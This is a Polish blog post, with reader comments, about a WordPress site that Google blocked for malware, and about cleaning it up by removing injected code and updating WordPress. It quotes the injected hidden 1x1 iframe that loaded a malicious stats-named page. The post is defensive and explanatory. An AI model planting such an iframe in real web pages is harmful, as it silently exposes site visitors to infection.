Blokada witryny w google z powodu wykrycia malware.

Całkiem niedawno doznałem niezłego szoku gdy dostałem maila od Google, w którym zostałem poinformowany, że witryna www.poland2012.net, którą zarządzam została uznana za niebezpieczną dla użytkowników i częściowo zablokowana w wyszukiwarce.

Blokada polegała na wyświetlaniu w SERP-ach przy linku do witryny komunikatu: „Ta witryna może wyrządzić szkody na Twoim komputerze” ( ang: „This site may harm your computer” ). Po kliknięciu na link witryny pojawiała się kolejna strona z dodatkowym ostrzeżeniem „Ostrzeżenie – przejście do tej witryny może być niebezpieczne dla Twojego komputera!„, bez linka do strony docelowej. Przez to procent wejść z wyników naturalnych Google spadł praktycznie do zera gdyż jak widać bezpośrednio przejść an witrynę nie można było a szczerze wątpię aby komukolwiek mimo takich komunikatów chciał się ręcznie wpisywać adres „podejrzanej” domeny.

Powodem blokady domeny było zalezienie przez boty Google podejrzanych fragmentów kodu w kontencie witryny, które swoim działaniem mogły zainfekować potencjalnych odwiedzających. Z początku pomyślałem że to jakaś pomyłka bo przecież nigdy bym nawet nie pomyślał aby infekować kogokolwiek jakimś złośliwym oprogramowaniem typu malware czy spyware. Po chwili namysłu pomyślałem że przecież ktoś mógł taki kod wstawić w którymś z komentarzy do artykułów – przeszukałem zatem wszystkie treści wprowadzone przez użytkowników pod kątem wystąpienia „javascript” i „iframe” i nic nie znalazłem. Następną myślą było było sprawdzenie dla świętego spokoju źródła strony głównej. Jakże byłem zdziwiony gdy oczom moim ukazał się podejrzany kod:

<iframe src=http:///www.wp-stats-php.info/iframe/wp-stats.php width=1
height=1 frameborder=0></iframe>

Co najdziwniejsze kod ten znajdował się w środku tekstu wprowadzonego przeze mnie. Po kilku guglnięciach okazało się że to właśnie jest ten złośliwy kod o który chodzi Google – kod ten otwiera w niewidocznej ramce stronę, która infekuje system nieświadomego użytkownika. Czyżbym niechcąco go sam wprowadził? Niemożliwe…

Po kilku kolejnych guglnięciach okazało się że wersji Word Press’a, którego uzywam daleko jest do najaktualniejszej i w między czasie wydano kilka krytycznych updatów, które m.in poprawiały bezpieczeństwo danych. Zatem jasnym okazało się, że ktoś włamał się do systemu używając którejś z wykrytych luk i dokleił do niektórych postów niebezpieczny kod. Cóż uroki OpenSource.

Po odkryciu co i dlaczego jest nie tak zabrałem się za sprzątanie tego bałaganu, po kolei:

  1. Usunąłem zły kod malware.
  2. Zaktualizowałem Word Press’a do najnowszej wersji 2.3.2.
  3. Przesłałem informację do Google, że moja witryna jest już bezpieczna.

Po około dwóch dniach blokada w SERP-ach została zdjęta a tym samym sprawa zakończona.

Przygoda ta przypomniała mi o tym, że jeżeli korzystamy z jakichkolwiek aplikacji OpenSource to aby zapewnić maksymalne bezpieczeństwo trzeba ją regularnie aktualizować.

Jeszcze dla podejrzliwych dodam, że nie jest możliwe aby witryna została uznana za groźną poprzez jej zgłoszenie przez konkurencje. Proces sprawdzania witryn i ich ewentualna blokada jest procesem w pełni automatycznym.

Przydatne linki:

edit:

Google udostępniło poradnik dla webmasterów „Co zrobić gdy moja strona została zhakowana?„. Poniżej dodatkowy film:

12 komentarzy do “Blokada witryny w google z powodu wykrycia malware.”

  1. Wlasnie tez przed chwila mialem taka sytuacje, ale zdziwilem sie jeszcze bardziej, gdy ostrzezenia w wynikach wyszukiwania sa przy kazdym linku – nawet samego google:)

  2. JAKIES PIETNASCIE MINUT TEMU TEZ MIAŁEM COS TAKIEGO PRZY KAZDEJ STRONIE KTÓRA MOZNA BYŁO ZNALESC PRZEZ GOOGLE, I NIE IWEM CO TO BYŁO, JAK KTOS WIE TO NIECH POMOZE, TERZA MAM WSZYSTKO OK ALE DLACZEGO TAK SIE DZIAŁO NIE MAM POJECIA

  3. Nie ma się czego obawiać, wczoraj google miało jakiegoś buga i ten komunikat wyświetlał się dla wszystkich wyników w wyszukiwarce. Dzisiaj już jest OK. Jak widać, nawet wielkie google nie może ustrzec się bugów.

  4. Jeśli korzystasz z Firefoxa 3 i widzisz czerwony ekran ostrzegawczy poniżej, a jeszcze wczoraj Twoja witryna była normalnie dostępna, to zapewne padłeś ofiarą działania trojana wykradającego hasła, a potem bota który zmodyfikował pliki na serwerze Twojej witryny.

    1. Nie zapamiętuj haseł do FTP, SSH itp. w żadnym programie takim jak Total Commander. Usuń hasła tam zapamiętane.

    2. Zainstaluj dobry program antywirusowy i przeskanuj komputery wszystkich webmasterów, aby pozbyć się trojana.

    3. Zmień hasła FTP do wszystkich kont webmasterów Twojej strony

    4. Dokonaj edycji wszystkich zainfekowanych plików typu index.*, login.* na Twoim serwerze. Wystarczy że usuniesz podejrzany javascript, albo iframe, który zwykle znajduje się zaraz za znacznikiem albo przed znacznikiem pliku HTML, ewentualnie na końcu pliku PHP. Zmienione pliki poznasz po dacie modyfikacji, zwykle takiej samej dla wszystkich.

    5. Zgłoś swoją witrynę do usunięcia z listy witryn zawierających złośliwe oprogramowanie. Użyj do tego Google Webmaster Tools – zaloguj się, zweryfikuj witrynę jako swoją, a następnie zgłoś ją do weryfikacji.

    Najdalej po 24 godzinach Twoja witryna powinna być normalnie dostępna, o ile rzeczywiście zostały z niej usunięte wszystkie złośliwe kody wprowadzone wcześniej przez boty.

    Przy okazji – Twój dostawca hostingu najprawdopodobniej nie miał z tym zdarzeniem nic wspólnego. Zawinił pewnie program antywirusowy (a raczej jego brak), ewentualnie czynnik ludzki.

  5. POMOC INFORMATYCZNA!

    Skasujemy wirusy na twojej stronie w kilka godzin – twoja strona będzie do 24h – W google bez napisu „Ta witryna może…”

    GG: 6658739

    NISKIE CENNY! JUŻ OD 20zł/netto!

    Pozdrawiam Serdecznie
    Usługi Informatyczne „Axel”

  6. To pewnie wina Total Commandera. Macie trojana, który wykrada hasła i dołącza złośliwy kod do index.php a w przypadku WP do szablonów. Pisałem o tym na moim blogu. (link w podpisie)

  7. Witam.
    Nasza firma specjalizuje się w między innymi usuwaniu szkodliwych IFrame oraz ponownemu indeksowaniu strony oraz zgłaszaniu o usunięciu wpisów ostrzegawczych w Google.pl.
    Cała procedura w naszej firmie zajmuje do 5 dni, do tej pory posiadamy 100% pozytywnie zakończonych interwencji. Koszt kompletnej usługi wynosi 190 zł netto + 22% VAT.
    W razie zainteresowania prosimy o kontakt http://www.bbsoft.pl.

  8. „Przygoda ta przypomniała mi o tym, że jeżeli korzystamy z jakichkolwiek aplikacji OpenSource to aby zapewnić maksymalne bezpieczeństwo trzeba ją regularnie aktualizować.”

    Co to za propaganda? Kazde uzywane oprogramowanie powinno byc aktualizowane pod katem wykrytych dziur. Czy uwazasz, ze jezeli za cos placisz to moze byc dziurawe jak ser?

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *